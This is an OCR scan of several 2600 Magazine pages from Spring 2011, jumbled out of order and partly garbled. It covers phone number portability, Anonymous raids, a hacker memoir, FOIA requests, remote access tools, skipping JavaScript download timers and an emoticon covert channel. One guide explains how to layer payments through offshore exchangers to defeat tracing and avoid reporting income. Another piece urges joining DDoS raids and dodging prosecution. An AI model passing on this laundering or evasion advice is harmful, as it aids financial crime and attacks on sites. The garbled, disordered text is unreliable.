frequently dialed numbers for a few hours
(after all, there is no need to dip 300 times
a minute to find out whether the local Top
40 station's phone number has ported in the
middle of an on-air promotion).
And with that, it's time for me to settle in
for the long flight ahead. Enjoy your spring,
and don't call anywhere I wouldn't!
the tandem (SITLWA06C9T) and the end
office (STTLWA06DS6). The long distance
carrier would select a route to deliver the call,
drop it off with the appropriate routing data
at the tandem, and the local exchange carrier
(Qwest in this case) would route the call to
the end office.
Now suppose the Seattle Public Library
(used in the above example) changes their
local service' provider to Level 3, a local
CLEC. This creates a couple of problems.
First of all, the CLLI of the end office is
now STTNWAHODSO, and the tandem has
changed too. It's now EVRTWAXA03T, a
Verizon (ex-GTE) tandem, which isn't even in
Seattle. A local routing number has also been
assigned. Although the telephone number
remains (206) 386-4656, the local routing
number is now in the (206) 569 NPA-NXX.
The OCN (Operating Carrier Number) has
also changed, which creates another problem;
access charges are paid to the carrier that
delivers the call, and when a number is ported
it's necessary to track this accurately. In the
VoIP wholesale world, which is how long
distance calls are increasingly handled, routes
are selected based on the serving OCN.
All of this means we now need more data
to route the call. If we only use the infor-
mation the LERG gives us, we're going to
deliver the call to the wrong switch, through
a tandem in the wrong city, with the incorrect
LRN. The call will still go through (because
even though Qwest is not required by FCC
rules to forward incorrectly routed calls to
ported numbers, they generally provide this
service), but Qwest doesn't do anything for References
free and the Revenue Assurance department • http://www.npac.com - National
is rarely amused by expensive transgressions Portability Administration Center
in translations. • http://www.npac.com/regions/
How, then, do we complete the call? Enter -s 0 u t h we s t / s wdo c s / t e xa s /
NPAC. Along with providing number porta- _ T tS . t d vz
bili . b h . 1 d wi li sw es c r i.p s. oc - very
ihty services to ot WIreess an WIreme detail d NplAC d t nfizuri
. etai e fi ocumen on co gunng
earners, NeuStar operates the NPAC data- lati c. LNP 'T' rrifi d c. th
. trans ations lor . re c rea lor e
base. For every telephone number In the ...
North American Numbering Plan, the NPAC technically inclined,
database maintains the associated LRN. • http://www.transnexus.com/
This can be used to determine a telephone -News%20and%20Events/20091
number's true CLLI and end office, and also -Number_Portabili ty_Astricon
the correct OCN for routing and billing. A - - 2009 . ppt - Excellent PowerPoint
database "dip" is generally performed on the presentation which describes LNP consid-
switch using the IN or AIN SS7 triggers. Of erations for VolP carriers.
Page 14 2600 Magazine
enormous prison sentences for merely denying a
site a few hours uptime.
This is how an epic Anonymous raid typically
happens. Blackhat hackers who make their living
basically being blackhat, leak some exploit code
that's no longer financially feasible or donate their
botnets which are near the end of their lives. They
go on IRC, /i/nvasion, 4chan, and other huge messes
of non-conforming Facebook or Twitter communi-
ties and spread the word that an epic raid is about
to go down. Random people slightly advanced in
throwing together scripts then put these exploits
or DDoS tools into an easy-to-use point and click
program anybody can run, then flood everywhere
with an ad calling for volunteers to help them in
global e-jihad. A raid is born, a site is down, then
the media trolling begins. Everybody is encour-
aged to contact the media and declare the latest raid
for whatever ridiculous political or troll reasons. I
once saw Fox News broadcast a guy claiming it
was an organized group of people with AIDS
against condoms. Not just ten minutes later, CNN
had a "confirmed Anonymous source" claiming it
was a carefully staged social protest against Steve
Jobs. You'd be surprised what the media will print!
run after a raid goes down. This only contributes
to the lulz, and ensures future raids since so much
mainstream attention is received.
That, basically, is Anon: Carders and crackers/
hackers who leak exploits or various tools to
middlemen who put it together for anybody to use.
Their combined efforts can source around 60,000
people on 4chan alone to join in the attack guar-
anteeing final victory (epic troool, in other words).
Sometimes anonymous attacks happen totally
at random. Ifyou find an exploit, or have a creative
prank, simply spam enough forums and image
boards with your idea and, if it's lulzy enough and
spreads chaos, you will be sure to have at least a
few thousands volunteers to help with the raid.
Just be sure you aren't one of those kids who
downloaded the LOIC program and ended up
with a three year sentence because they were able
to track you, intimidate you into talking (get a
lawyer, say nothing), and wrestle a guilty plea out
of you. Once they get that plea, they use you as an
example. Don't be an example if you're going to
do this. At least learn some sort of network subter-
fuge layering or wifi.
Shouts to TABnet, the adopted bastards
network and Max Ray Vision currently languishing
in a federal prison camp.
-------------------Page17
by Anonymous
If you had no clue about the tubes running the
Internets and scanned recent headlines on Google
News, you'd think total cyber war was upon us,
and civilization's death was imminent. Hundreds
of articles are currently up with dozens of different
opinions an<f"sources" claiming what is or who
exactly is Anonymous. Why so much press over
minor DDoS attacks and general miscreants?
Because every corporate media outlet loves Anon-
ymous. Fear of cyber jihad helps sell click ads, and
fits perfectly with the FBI narrative of crushing
all our freedoms to prevent the e-apocalypse.
They (FBI, SS, Interpol, CSIS, MIA) happily give
sound bytes to the media, so you'll remember how
dangerous uncontrolled communications are when
it comes time to vote on whatever new law they are
trying to push through Congress. Don't live in the
United States? Don't worry - these laws are soon
coming to a country near you.
So who is Anonymous? Is it really a super
secret band ofuber hackers who hide on a hidden
IRC channel waiting to unleash anarchy? Just a
bunch of kids? A "serious movement?" Is that
silhouette with the distorted voice in the interview
you just saw on CNN really the voice ofAnon?
Basically, Anonymous is e-Qaeda if you watch
CNN or even the BBC. In real life, Anonymous is
a banner used by whoever wants to get a laugh by
baiting the media, $cientology, or raiding epileptic
forums with flashing images. The goal is to create
anarchy and reinforce the reality that the Internet
should (and can't) be government or corporate
controlled through unprecedented massive semi-
organized trolling.
The unthinkable nightmare of virtual legions
of no-named people doing whatever they want
behind a cloak of anonymity to spread chaos. It
is a knife in the heart of corporatism, which is a
fanatical desire for a stable managerial, hierar-
chical society. Anonymous has absolutely no hier-
archy, no "leaders," and no clear direction. It can't
be measured quantitatively or even projected with
a long term statistical forecast. The rigid corporate
structures of our governments, military, and law
enforcement can't handle unpredictable citizenry.
To them, this is the worst thing that could ever
happen to their ideological vision of world order.
This is why the full force of the law is dispatched
after every anonymous prank, and its unlucky
participants who end up caught are usually handed
Spring 2011
T
,
have to remember that you lent that book to
Joe, and that you should get it back. The loan
time will expire and you will have it back.
• You buy e-books on your computer or device '
and you don't have to leave your house or
workplace. It's delivered right away so you
don't have to wait for days and risk not ever
getting it because someone, somewhere,
messed up.
• Your cost is usually lower, so you spend less
and can have more when you want it.
• If you need to make a reference to something
on an e-book, you can copy and paste. You
don't have to rewrite.
There are other possibilities and positive points
to e-books, but I will let you figure them out. What
really matters is that in the end the information you
needed was acquired, and now you are free to learn
more. It really doesn't matter where and how you
got it.

That Christmas, I got a modem and started calling
BBSes. Shared knowledge amplified intelligence.
I also learned how to be cautious and think about
what sort of "trail" I might be leaving with my
activities. The real phreaks were brute forcing long
distance calling codes and 800 numbers. I read that
an 800 number call would be traced as a matter of
course so that charges could be accurately calcu-
lated. This was OK if calling from a phone booth,
but not a good idea from my parents' second phone
line in our home office. I also learned to trade
information and, as long as I did not take credit as
being the originator, the community was OK with
me sharing it.
Fifteen years later, the Internet was up and
running. I learned to do things like dial into the
local library for their card catalog. It used Lynx
and I could give it any URL and surf for free. I
also learned to use the ''find'' command in shared
hosting accounts to find mp3 and movie files of
other users. Like 800 numbers, everyone had an IP
address that could be tracked.
Hackers are motivated by fun or the rush of
learning something new and forbidden. Hackers
are not motivated by greed or scams, but there
should be some sort of reward for their activities.
Hackers succeed by discovering flaws of unveri-
fied trust in a system, like a buffer overflow or SQL
injection. As Linus wrote, the highest form is "for
the fun of it."
by Lifeguard
Advantages to E-books
• The fact that e-books are electronic, you can fit
them in a small convenient device, and you can
have hundreds of books without the weight,
plus you can get whatever else that you don't
have on demand is a big advantage. Now try
carrying 190 books in your backpack.
• Once you are done and have no further use
for it, you can delete your e-book. No extra
effort is needed. Your attic will be much more
spacious and happy.
• For now you can't trade and loan, but maybe
one day you will be able to. What you can do is
have a virtual library that every person in your
company has access to for little cost. You can
always go back to it when you need to and you
don't even have to carry it around. You don't
I believe a person is only a hacker if another
hacker calls them one. Perhaps a better definition
is a person who manipulates a system in ways
other than were intended by the system designers
and operators. I feel hacking is more than just
penetrating systems without permission, but there
is definitely an overlap of skills. To illustrate
hacking, I am going to recount some stories from
my past. If this is not informative, I hope it is at
least entertaining.
The first personal computer I ever saw was an
Apple ][+ at my future best friend Mike's house.
The next Christmas, I got an Apple ][+ and fell in
love with it. The first hack I learned was that the
360k 5.25" floppy disks were double sided, but
unmodified would only work with one side up. So
we took a hole-punch, flipped a second disk over as
a template, and notched the disks so we could write
to both sides. Perhaps a more "hackish" trick we
learned was that a hex editor could be used to cheat
at computer games. In Ultima for example, we
could increase our character's strength, hit points,
etc. Scrolling through the hex looking for clear text
key value pairs taught me how to manipulate trust
to get what I wanted - the game writer "trusted" the
players not to modify the game to make it easier.
About a year later the movie War Games
came out and suddenly all the older kids wanted
to be hackers. It was cool to be a phone phreak.
Page 16 2600 Magazine
to see it before it gets censored, and if you are
savvy enough, you might make a copy ofthe infor-
mation before it degrades.
exchanger fees. Some exchangers such as
AurumXchange . com allow you to withdraw
directly to an ATM card.
Pecunix, based in Panama, is entirely based
on gold reserves. You trade in gold units. They
offer excellent anonymous protection if you move
payments to a different account to cash out. No
JavaScript.
Bitcoin is an encrypted, decentralized, truly
anonymous currency. Using the Bitcoin tumbler on
Tor, it is completely impossible to figure out who
paid you money from where. Numerous Bitcoin
exchangers such as Liberty Reserve exist who
will convert it into cash in the mail, or another
e-currency with an ATM card. Tell your customers
to mail cash to a Bitcoin vendor with your Bitcoin
address for direct third party funding. The best part
about Bitcoin is that there are no rules. It is the
future of money. Bank on it to survive any crack-
downs and protect your identity at all costs.
How can your customers use these systems?
Through exchangers who allow in-person cash
bank deposits in most major banks (up to $1000
a day, no ID needed), with mailed cash such as
nanaimo-gold. com, with bank wires, with
credit cards, with Western Union, or by converting
Ukash and Paysafecards they buy at gas stations
and comer stores. The possibilities are nearly
endless. You can even exchange Skype vouchers
into Liberty Reserve now.
What is not anonymous? Well, for starters,
MoneyPak, unless you hire a runner to cash it out.
Chargebacks are also possible - you can phone
them and have them cancel the codes. Same goes
for Ukash, Paysafecards, cashU, and other voucher-
based systems. The key here is to receive it to one
account, convert it to another currency, and then
cash out through somebody else. You have hope-
fully used three or four different countries at this
point and the trail is difficult to follow. You can
do this for under ten percent, which, if you think
is high, think of all the merchant fees charged for
accepting Visa/MC or money lost to chargebacks.
Accepting Western Union as a direct payment is
probably the most foolish way besides Paypal
for selling on the Internet. The secret question!
answer method no longer works in most countries,
and Western Union will report you for constantly
receiving transactions over a certain amount.
Anelik, iKobo, and other wire transfer systems are
equally dangerous and prone to held transactions.
How can you be your own exchanger? Ifyou're
in the U.S., don't even bother. The media will
claim you enable child pornographers or al-Qaeda.
The Secret Service will be all over you as Master-
card will dispatch them to shut you down. Some
clown who purchased Liberty Reserve through
you will try to sue you in Florida for enabling his
gambling addiction. Instead, register an IBC in
the Seychelles or Belize to open up bank accounts
to accept customer wires. You can register IBCs
Page 19
SMS forwarding gateway or a burner phone (see
The Prophet's previous 2600 article on Tracphones)
to receive the payments. Exchange the LiqPAYinto
another digital currency with the many exchangers
in Russia, Vietnam, Singapore, and the Ukraine.
Cash out - nobody knows who you are if you've
used a Virtual Visa or anonymous card for verifi-
cation (they block the card with a small transac-
tion, then ask you to enter it as confirmation). Be
warned: sometimes LiqPAYseizes accounts if they
are suspected of selling Ukash vouchers or other
digital currency, otherwise you shouldn't have any
problems with transactions under $200. It's free to
receive and move money around. If you live in a
former Soviet Bloc/CIS country (or can get a card
from there), you can cash it out directly to any Visa.
WebMoney, a Russian digital currency based in
Costa Rica. :'Sadly, this used to be a good anony-
mous currency, but they have turned into the
PayPal of Russia, freezing and seizing accounts
for whatever reasons. However, you can buy
WMZ (WebMoney in USD) prepaid card codes
from buywrnz. corn and other exchangers with a
credit card, and then email them to somebody. That
person converts it to something else and cashes out
anonymously. You don't even need a WebMoney
account. Exchangezone . com is a good place to
find other people willing to do this at 1:1 cost.
Liberty Reserve, one of the original e-gold
currencies based out of Costa Rica. You can make
as many LR accounts as you want, and easily
move money around. The only currency more
anonymous than this is Pecunix and Bitcoin. Don't
like the JavaScript login? Rent a remote desktop
for 5-10 dollars a month or make your own with
a cheap VPS. Your customers don't even need
Liberty Reserve accounts, they can simply pay
an exchanger to fund your account directly. It's
up to the exchanger to verify buyers, not Liberty
Reserve. They simply provide a site to move the
money around, not to buy in or cash out directly.
This is probably the most accepted payment
system going, and they allow private transactions
to hide your details when transferring to another
account. No chargebacks allowed, has USD and
Euro accounts. Always move money around before
withdrawing, and use different exchangers to keep
anonymity.
Perfect Money, based in Panama and suppos-
edly Zurich allows third party wires directly
to your account or free account funding via
bank wire. This is also a great currency to fund
your Liberty Reserve account with. Make an
account, fund it (free), then use exchangers like
superchange . ru to convert it into Liberty
Reserve for a low fee. Adds an extra layer of
anonymity.
C-Gold, based in the Seychelles and Malaysia,
has been around since 2001. They have some odd
rules, but otherwise it's an excellent system if
you don't mind paying the typical 6-10 percent
Spring 2011
gion with lawyers, corporations, or rival porn
studios run by the mob. Whatever the reasons, it
is now very easy for anybody in the world to buy
digital currency and pay you with it. The days of
complicated and expensive bank wire transfers
to Latin America just to fund an account with 12
percent fees taken by middlemen along the way are
gone. Rejoice! Let's punt some junk on the Internet
and be anonymous.
Before I begin, every time this topic is brought
up, somebody immediately reacts loudly that anon-
ymous currency must only be used for heinous
criminal activity like terrorism, and therefore
should be controlled. Yet they probably use cash
every day which is (omg) anonymous - though not
for long. In 20 years, we'll most likely be forced
to have cash credits traded on cards that log every
transaction. Tell them criminal gangs use stolen
cards, logins, and professional laundering services
like ePharma merchant account resellers to cash
out with layers of shell companies and casinos.
Terrorists use a cash honor-based system that has
been around since the eighth century called Hawala
(which is actually a pretty awesome idea when you
read up on it). They also get their money by skim-
ming cash from all that so-called rebuilding money
floating around Afghanistan and Iraq. Besides, you
don't even need money to be a terrorist. Remember
the Unabomber? He lived in a wooden shack
without running water or electricity. The 9/11 guys
didn't need a bunch of money to buy box cutters
and one way tickets. Child porn traders and other
morally repugnant vendors at the shallow end of
the human gene pool do not actually sell anything.
Sure, there may be sites appearing to sell this stuff
saying you can buy their illegal porn, but it's either
a trap, or the RBN who is going to hold your info
ransom after payment to extort more money out of
you. Do not believe the myth that there is some sort
ofglobal child porn profitable empire in 2011. This
is created by the media and fictional cop drama
television, and perpetuated by our governments so
they can get an excuse to monitor financial trans-
actions. When that excuse doesn't work they'll
find some other reason, which they already have
- called intellectual property rights.
Your road to digital e-currency begins at the
talkgold. com and bi tcoin. org forums
which list legitimate exchangers. Here's a break-
down of some of what's currently available and
easy to use:
LiqPAY (Liquid Payments Inc.), based out
of the Ukraine. With a phone and a credit card,
anybody can send you up to $200 per transaction
and the payment can't be charged back. Use an
2600 Magazine
How to Accept
Payments Anonymously
A Digital Currency Guide
by Max Vendor
https://privacybox.delmaxvendor.msg
You wish to sell something. You don't want
anybody to know who you are. Maybe you don't
want to be at risk to rampant civil litigation or
exposed to fraudulent buyers, or perhaps your
competition is completely evil and will come after
you for infringing upon their monopoly. Or you
could live in a country blacklisted by the western
corporate structures of modem financial payment
systems such as PayPal, Visa/MC, Moneybookers,
etc. Or you are Julian Assange and don't want your
donations stolen.
In what the media likes to refer to as the "post
9/11 world," we are all at the mercy of the U.S.
government, who for the past decade or so has
been pursuing a policy to extend the global reach
oftheir lobbyists' claws to pretty much everywhere
on earth. Basically every country must give up
personal data and conform to identification regula-
tions for transactions under the guise of security
or protecting copyrights. Noncompliance means
sanctions, and a variety ofother strong arm tactics,
so eventually almost all of the world's govern-
ments have caved to these reporting requirements.
It's not like all our countries aren't filled with the
same corporations buying off the same technocrats
we call leaders anyways. This was bound to happen
eventually with the growing cancer ofcorporatism.
Remember personal Swiss numbered accounts?
Long gone. Cayman Islands offshore protection?
Same. They've even gotten all those micro-coun-
tries in Europe like Jersey, whose only income was
probably offering a tax haven. Even they caved.
Transfer systems such as PayPal in some situations
can have your linked bank accounts frozen, and
they give away your info to practically anybody
who faxes them a legal letterhead. If you can cut
and paste some legal website's logo and use an
online fax service, you can probably get anybody's
info, or have their account held, or demand further
verification. The harassment potentials have no
bounds. There are online lawyers everywhere now
who do this for only $50. The MPAA probably
has a button they push that freezes accounts upon
request.
Instead of buying fake ID and scans from
vendors on shady carding forums and exposing
yourself to Secret Service or Interpol honeypot
traps, there are in fact methods to conceal your
identity and still sell something without undesir-
able people knowing who you are, people like
lawyers, secret police, the media, organized reli-
Page 18-----------
--------------------Page21
for only $900 through various company forma-
tion sites. Check them on safeorscam. com
or talkgold. com first to make sure they are
legit. Or be an independent anonymous exchanger.
e-cardone. com is the largest wholesaler of
Liberty Reserve, and currently their authorized
site to apply to be an exchanger. Just be careful
with enabling the Liberty Reserve API - it would
be safer to do manual transactions to prevent
getting robbed (which has happened - read the
trainexservice. com blog about it). You
will probably also require DDoS-proof hosting (or
Tor), and a domain that isn't registered by any U.S.
company to prevent it being yanked. When control-
ling large amounts of digital currency, you should
use something like The Amnesic/Incognito Live
System to log into your own private desktop that
you preferably set up yourself (or VPN), combined
with an encrypted USB drive from the German
Privacy Foundation or IronKey. Make TrueCrvot
containers on those drives and keen your
First off, this article assumes that you are a
dude or dudette living in the United States who
wants to know what the U.S. government knows
about you. This is actually a pretty easy endeavor.
It is not, however, quick. It involves snail mail
and is guaranteed to take at least three months to
receive any results.
Why you want to know what the government
knows about you is your own business. However,
if you know that you have done something that
could get you arrested if they knew where you are,
you might not want to proceed. Also, this is not
a primer on how to get your brother's records, or
your mother's, or your great-grandfather's who
you believe worked for Al Capone.
There's also that rumor that if you ask the FBI
to send you a copy of your file and they find you
don't have one, they start one on you right then
Page 20
accounts' passwords on them. If really para-
noid, you can use something like Shamir's Secret
Sharing to split the key up into two drives that both
need to be accessed in order for it to work.
Make sure if withdrawing from your offshore
business account, you aren't using the debit card
it comes with. Fund a third party card and use that
so they can't trace back to your bank in Cyprus,
Latvia, wherever if you would not like to report
your income due to various reasons. In Moscow,
it's downright dangerous to pay your taxes. Once
the organized mob calling itself the Moscow City
Council finds out you have money, they just come
to extort as much more as possible. In some coun-
tries, it's best if your government doesn't even
know you exist.
Writer supdate: Liberty Reserve is now actu-
ally dangerous to use, due to Costa Rican banking
laws recently changing. "HD- Money" and Bitcoin
are now the chosen currencies for best anonymous
must be
having a file on you. It's like the one where if you
buy a copy of 2600, the ever-present "they" start
tracking you. I'm starting to wonder what happens
when you write for 2600.
First, who do you think has a file on you? I'm
talking about those (typically) three-letter-organi-
zations, the FBI, NSA, CIA, DHS, etc. Since it's
so easy to write one letter and change it slightly for
each organization, why not send a letter to all of
them? Remember, the price of a stamp is currently
44 cents.
There are two Acts at work here. First, there
is the Freedom of Information Act (FOIA), which
was signed into law by President Johnson in 1966.
It is a law that promotes openness in government
and allows members of the public to request docu-
ments from the various governmental entities.
The second Act is the Privacy Act of 1974. This
Act governs the collection, maintenance, use, and
2600 Magazine
dissemination of personally identifiable informa-
tion about individuals that is maintained in systems
of records by federal agencies. The Privacy Act
also prohibits the disclosure of information from
a system of records without the written consent of
the subject individual.
In order to obtain any documents about your-
self, you have to invoke both Acts in a letter to
each organization you wish to contact about your
records.
In your letter to each organization, it would
help to follow proper letter writing protocols.
That way, whoever receives your letter will have
an easier time reading it and figuring out what
you want. The scope of this article does not
include teaching you how to write a letter. If you
would like a refresher course on how to write a
letter, then ~ e "proper letter writing format"
into your search engine of choice. However, the
CIA has a great sample FOIA/PA letter online at
www.foia.cia.gov/sample_request
"_letter. asp.
Now. that you are ready to write your letter,
it should contain the following information: the
fact that you are seeking any records that organi-
zation has about you, an explanation that you are
invoking both FOIA and the Privacy Act, your full
name, any alias you may have used (ifyour name is
William, but people call you Bill, this would fit, as
would any screen name or "hacker name" you use
or have used), date of birth, where you were born,
social security number, phone number, current
address, and a fee you are willing to pay for this
service. I recommend $25, but note that you do not
have to send this money in unless they ask for it,
and if they do ask for it, it means they must have
quite a bit of files to send you. I have requested
files from FOIA from several government organi-
zations and none ofthem have ever charged me for
the files they sent, though they did inform me that
more information is available at a price.
The Secret Service's FOIA page states that you
need to sign your letter and have a notary witness
it or affix the following to your letter: "I declare
under penalty of perjury that the foregoing is true
and correct. Executed on [date]." You should also
include a copy of your driver's license or other
identification so that they can compare your actual
identification to the information you have provided
(and your signature on your license to the signature
on your letter).
Now that your letter is written, below are the
addresses of the various governmental agencies
you may want to try contacting. I am only giving
the address to the main FBI location, not the branch
offices. You may want to check the FBI's website to
find out the nearest branch office to you and appeal
to them as well. These are just a few of the organi-
zations you can contact about records. If you were
ever in the military, there is a slew of resources
online available to help you figure out where to
Spring 2011
send your inquiry as to your military records.
Drug Enforcement Agency (DEA)
Freedom ofInformation Operations Unit (SARO)
Drug Enforcement Administration
700 Army Navy Drive
Arlington, VA22202
Secret Service
Communications Center (FOIIPA)
245 Murray Lane
Building T-5
Washington, D.C. 20223
Department of Homeland Security (DHS)
FOIAIPA
The Privacy Office
u.s. Department ofHomeland Security
245 Murray Drive SW
STOP-0655
Washington, D.C. 20528-0655
Federal Bureau of Investigation (FBI)
Federal Bureau ofInvestigation
Attn: FOIIPARequest
Record/Information Dissemination Section
170 Marcel Drive
Winchester, VA22602-4843
National Security Agency
National Security Agency
Attn: FOIAIPA Office (DJP4)
9800 Savage Road, Suite 6248
Ft. George G. Meade, MD 20755-6248
Central Intelligence Agency (CIA)
Information and Privacy Coordinator
Central Intelligence Agency
Washington, D.C. 20505
INTERPOL (USNCB)
Office ofthe General Counsel
INTERPOL-U.S. National Central Bureau
Department ofJustice
Washington, D..C. 20530-0001
Defense Intelligence Agency
Defense Intelligence Agency
ATTN: DAN-1A (FOIA)
200 MacDill Blvd
Washington, DC20340-5100
Odds are that you should only try contacting
agencies you believe would have information on
you. Ifyou've never robbed a bank or tried to kill a
President, you might not want to bother the Secret
Service. But, even if you haven't, why not send
them a letter anyway? You never know what you'll
find.
:BYPASSIIlG JR'JRS[RIPT TIMERS
DR IDJ I LERRIlEB TD STOP
WR I TIf1G RflB LD'JE THE 'JARIR1JLE
Remote Login Made Easy
Application 2: Dropbox.com
Thefree version ofDropBox allows you to have
two gigs of cloud storage. You install DropBox on
a computer and it's like a share drive. Simply put,
you copy the file to your DropBox folder on your
remote machine, and happily receive the file in one
piece on your local machine, and vice versa. As
an added bonus, this is a great way to move files
to your friend's computer or even your Android
phone without any cables. They've got some pretty
neat sharing features to mess with, and even that
is free.
And there you have it! Full remote access
with all free software. If you're ever making a
purchasing decision for a company, try to throw
a bone these guys' way, because that's why we're
getting these services for free in the first place!
Page 23
is informational,
and that the pass-
words differ... and
those passwords
had better differ
*waves finger*).
Everyone at my work is always having trouble
connecting to their machines because the VPN or
the Terminal Services are not working. Constantly
I hear people bicker about their inability to perform
remote duties. I've given up on using their ways for
a while now, and I've never had a single problem
logging into my office machine. Though I do have
the password to the router (muahaha) I've never
had to port forward anything.
I'm sure LogMeIn is pretty happy with all I've
had to say about their product... all the way up
to this point. What's the catch? The free version
gives you full access to the machine except you
can't transfer files. Rather than paying LogMeIn's
monthly fee that I can't seem to justify for my
personal needs, we simply need an easy way to
transfer our files!
Today's Easy Way (With Free Software)
There are two applications that I use to keep my
remote access simple. Both of these applications
have free Android implementations which means I
can manage any of my computers from anywhere.
by GantMan
Application 1: LogMeIn.com
The free version of LogMeln will allow you to
access your computer from a web page, even when
it's behind a NAT router. It also presents you a list
of all your computers you have access to, in a way
that you can even organize them into batches, and
name them as you see fit. From a security perspec-
tive, LogMeln machines are accessed by the main
LogMeln server, so not only are you protected
from exposure, but a hacker would need the pass-
word to your LogMeln account and the password
to your local machine account (assuming the attack
Spring 2011
If you're like me, you've got about five
computers (Work, Work Laptop, Home, Home
Laptop, Mediacenter). Sometimes you just need to
login to check how your Torrents are going, or just
to grab a file you might have been working on.
Way back, in the long long ago, we would RDP/
VNC into our desktops when we needed access.
That is... unless we were behind a NAT (Network
Address Translation), like most of us were. Then
we'd have to port forward, and expose ourselves
to the blistering cold world, or hide behind a nice
VPN (Virtual Private Network) which most of us
either never understood how to set up or didn't
have the hardware necessary to set up. Sure, some
of us got by with Universal Plug and Play (upnP)
but, let's face it, it wasn't as easy breezy beautiful
as we had hoped it would be. There was no bit to
flip, no switch to hit, and sometimes we didn't even
have permission or physical access to the router at
all! Exempli gratia workplace hardware.
Most of the websites I've seen have some type little JavaScript timers is all well and good, but
of function that follows this. The longest part of how does this make me a better hacker?" Well,
this process is finding the JavaScript for the timers for the beginners out there one of the first things
the first couple of times. Of course, there are some t h k I . .' d i th HTML
. . mos ac ers earn IS messmg aroun m e
scnpts and a grease monkey scnpt to automate . ,
this process, but those really only work for certain source code ofweb pages. Ifyou didn t know much
websites. about JavaScript, you now know about messing
Ofcourse, some cheeky websites like to deposit around with variables, .and JavaScript timing
files which use a little piece of code called "Show_ events. We've even touched upon concatenation.
urlt)". This makes the .whole p ~ o c e s s much easier Ho efull ou will take this article and find other
as all you have to do IS find this guy and replace . p . y y
whatever is in the brackets to whatever time you little tncks around other web pages. It all starts
want to wait, be it 10 seconds or zero seconds. with the little steps. As long as you keep moving
So you may be thinking, "Well, OK, bypassing forward, you'll be a better hacker in no time!
//////H/////////H#/H//#///////////Q//HH///HH/////H/#/H///H/////////////H//#///###/H//##H////////#/H/H//H//H/////H/H/////H//////////M'/#//
var c=50; _
if (window.location.hash
- "#dlt")
c = 0;
window.onload = fc;"
Hmm... Simple little piece of code if you
know JavaScript or have a good grasp of basic
programming. If not, I'll point out a few things.
Here we have a piece of code showing the seconds
remaining:
<h3 style="font-size:24pt;" id=
-"zeit"> ' + c + ' seconds
- remaining</h3>
That "c" right there is an important piece for us
because it is displaying the "seconds remaining"
on the actual web page. This is known as "concat-
enation," taking a variable and placing it next to a
predetermined string of characters. Here it's used
to place what "c" represents next to the words
"seconds remaining." Now we just need to find the
part of the code that uses "c" as a variable.
A few lines down we find:
var c=50;
if (window.location.hash
- "#dlt")
c = 0;
window.onload = fc;
''var c = 50" tells us that the variable "c" will
be set for 50. But what happens if we change "c"
to zero to begin with? The zero is sent as normal
and the link appears as if you waited. Great! Now
I can use that extra 50 seconds of my life to do
something more productive.
Another way to mess with the timer is to tinker
around with JavaScript timing events. We look at
the following line of the "Interesting Bit of JavaS-
cript" we saw earlier and find:
c=c-1;
setTimeout("fc()", 1000);
This piece of code tells "c" to wait 1000 milli-
seconds, which is one second for those not in
the know, before continuing. This variable is run
through a loop with some of the code above. The
line "c=c-l" makes "c" tum in to 49 then 48... 47...
46 until it finally hits zero and tells the code to
execute the "if' statement. The syntax for JavaS-
cript timing events is:
setTimeout("JavaScript statement"
-,milliseconds);
Basically when the milliseconds run out, it will
execute the statement "fct)". So what if we change
"1000" to "1"? Well, the loop will still go, but at a
fraction of the time it would have normally taken.
2600 Magazine
by K3ntucky
This tutorial is about bypassing the timers on
a couple of the-bigger downloading sites (mainly
Rapidshare, Megaupload, and Deposit Files. There
are, of course, others but I found the most luck on
these sites.). Not too sure if I really need this but:
This information is for educational purposes only.
Only you will be held responsible for the actions
that occur from this information. (Just wanted
to cover my bases.) In this article I will be using
Rapidshare as my example. This is, however, by no
means a strictly Rapidshare bypass. This is really
a JavaScript bypass, if the site uses JavaScript
for their timer, then you can use this information.
Don't worry about finding a JavaScript timer; As
W3Schools. com will tell you "JavaScript is the
scripting language of the web."
Quick note: I'm using the latest version of
Opera for this. Opera has a built-in function where
you can view the source code in a tab and then
reload the web page with new code inserted. This
comes in really handy when you want to mess
around with web pages.
So, to set the scene: It's another night in front
of the computer and I'm scouring the Internet to
try and find a couple of good PDFs to put in my
new e-book reader and just found a collection of
programming books. I clicked the link and was
soon staring at a Rapidshare page. Not being a
member of this web service, I had to click the free
link. In about 89 seconds the books would be mine.
However, after about 15 seconds I grew tired of
having to wait. My hacking sense started to tingle
and I opened the source code page. After a little
poking around I found what will bereferred to as
"Interesting Bit of JavaScript":
"Function fc() {
if(c>O){
document.
getElementByld("dl") .innerHTML
- 'You are not a Premium User and
-have to wait. Please notice
-that only Premium Users will
-get full download speed. <h3
-style="font-size:24pt;" id="
-zeit"> ' + c + ' seconds
- remaining</h3> , ;
c=c-1;
setTimeout("fc()", 1000);
} else {
... *Nothing to really see here, just code to be
executed when certain conditions are met.
Page 22
8i•• \JOi *.• t1. =

®Qe ee
' . all '" .. " 0-' .);
.
(,) ( . . - .- .' • .!1
••• . @o ·
" 6?8l/)aSe2i by Armando Pantoja
As popular as emoricons are today for
conveying emotion, they also present an opportu-
nity for covert channel communication. A covert
channel is a communicat ions channel which allows
information to be transferred in a way that was not
intended by the creators of the system. An effec-
tive coven channel requires three indispensable
properties : plausibility, undetectability, and indis-
pensability. MSN Messenger emoticoos are useful
for coven channel communication because they
satisfy all three properties. MSN is used all over
the world for communication in the workplace as
well as in the home . It has constantly been one of
the top three instant messenger application over the
last ten years, therefore its use is extremely plau-
sible. Users tend to pepper each line of text with
several emoticons during an average conversation,
therefore a third party listener would have no idea
that a secret message was being transmined. As a
result, this system is very undetectable, with emoti -
eons' popularity that have essentially now become
a part of the alphabet and are indispensable.
The objective of this system is to covertly send
data from one client to a host. In order to send
messages over the covert channel , two bits of the
covert message block is transmitted per line of text,
and, for simplicity's sake, only one emoticon can
be sent witb each line of text, Eight different ernot-
icons were chosen and were separated into two
classes, happy class and sad class. The emoticons
were chosen by the particular emotion they were
trying to convey and needed to closely match the
other emotions in its respective class. The channel
can be represented as such:
Bits Happy Sad
Transmitted Class Class
00 :) :'(
01 :d :(
10 ;) :1
II :p :-1
Page24
This system was implemented on top of the
DotMSN Open Source .Net messenger library,
created by Xih Solutions, and was written in
VB.net. There is a sender (Alice), which sends both
the overt message and the coven one and a receiver
(Bob) which writes the results to a text file. This
system tried to avoid detection by an independent
observer (Wendy) by encoding the message in a
series of ernoticons. The covert message is typed
in the auxiliary window of the sender. the user
then clicks the button "stan transmission", and this
converts the ASCII text into binary. Bit by bit; this
binary representation is transmitted over the MSN
network via the above emoticons along with the
overt message. For example, if the user types in
":)", if the ":)" is transmitted successfully, the other
recipient will read this as a "0", if it is shifted, the
